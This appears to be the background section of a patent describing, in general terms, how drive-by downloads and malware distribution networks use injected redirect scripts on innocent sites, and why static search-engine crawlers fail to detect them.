The reach and scale of the Internet has fostered a parasitic industry of those who seek to illegally and/or unethically profit. A common strategy to profit illegally is to infect computers of users with malicious code (malware) that can be employed to obtain passwords, transmit spam, retrieve contact lists, participate in a botnet, etc. An author of malware, to successfully infect a machine (and thus to successfully profit) needs the following: malicious code that is intended to execute on a computing device, a manner to cause the malicious code to execute on the computing device, and an introduction to a user upon whose computing device the malicious code is to execute. Authors of malware often find that obtaining introductions to users and causing malicious code to execute on their respective machines is a much greater challenge than the actual construction of the malicious code. An exemplary approach distributors of malware have employed is social engineering, which is the process of using false pretenses to lure a user into installing malicious code on a machine of the user. In this approach, the introduction to the user is often obtained through spam.
Another exemplary approach to cause malicious code to execute on a computing device of a user is the exploitation of unpatched vulnerabilities in an application resident on a computing device. A drive-by download is one particular example of this approach, where the application with unpatched vulnerabilities that are desirably exploited is a web browser. For instance, a vulnerability of a web browser can allow malicious code to execute on the machine of a user without knowledge or consent of the user (e.g., without the user confirming that the malicious code is to be downloaded). In this approach, when a user causes a vulnerable browser (one with unpatched vulnerabilities) to visit a malicious web page, a computing device upon which the browser is executing is infected with malicious code. For example, an author of malware can set up a web site that hosts malicious content, waiting for users with vulnerable browsers to visit the web site. It can be ascertained that a number of computing devices that can be infected is directly related to the amount of traffic of web site(s) set up by the malware author.
A more common approach undertaken by malicious attackers is to infect an unknowing (innocent) web site with code that directs a browser, when loading a web page from the web site, to load malware from some other site (e.g., through a series of redirects). From the perspective of the attacker, a particularly attractive aspect of this approach is that traffic of the innocent site can be piggybacked. Thus, the introduction of the attacker to the user is provided by web traffic that a site is already attracting. Typically, rather than defacing performance of the innocent site, the attacker generally injects a malicious script that is employed to (eventually) redirect the vulnerable browser of the user to a server hosting a malicious payload. Accordingly, a computing device of the user that possesses the targeted vulnerabilities will become infected with the malicious payload. The initial web page loaded by the browser is referred to as the landing page, and the site with the malicious payload is called the exploit server.
Oftentimes, the path from the landing page to the exploit server will include numerous redirects. In an example, if the attacker succeeds in infecting the web server at foo.com, the attacker can direct all traffic to load the malicious content from bar.com. This can be done indirectly, such that a page at foo.com points to a.com, which points to b.com, which points to c.com, and so on, until the traffic reaches bar.com. Many times there will be many landing pages that share a small collection of exploit servers. The landing pages may also share some nodes in their redirection paths to the exploit servers. The collection of landing pages, exploit servers, and redirect servers is known as a malware distribution network (MDN).
Providers of web browsers generally attempt to quickly identify and patch vulnerabilities. Oftentimes, however, end users are not quick to update browsers on computing devices of the end users with appropriate patches. Search engines also attempt to identify web pages associated with malicious content, such that users of a respective search engine do not have their machines become infected, and subsequently quit using the search engine. The architecture of an MDN, however, makes the task of identifying infected landing pages, redirect servers, and exploit servers very difficult. This is at least partially because static crawlers, used by search engines to build their respective indexes, retrieve contents of web pages and do not execute any scripts that are coded into the web pages. The failure to execute scripts is due to the incredibly large number of web pages that search engines attempt to index; on the order of billions of web pages per day. Therefore, malicious actions performed by scripts on a landing page are largely invisible to static crawlers employed by search engines.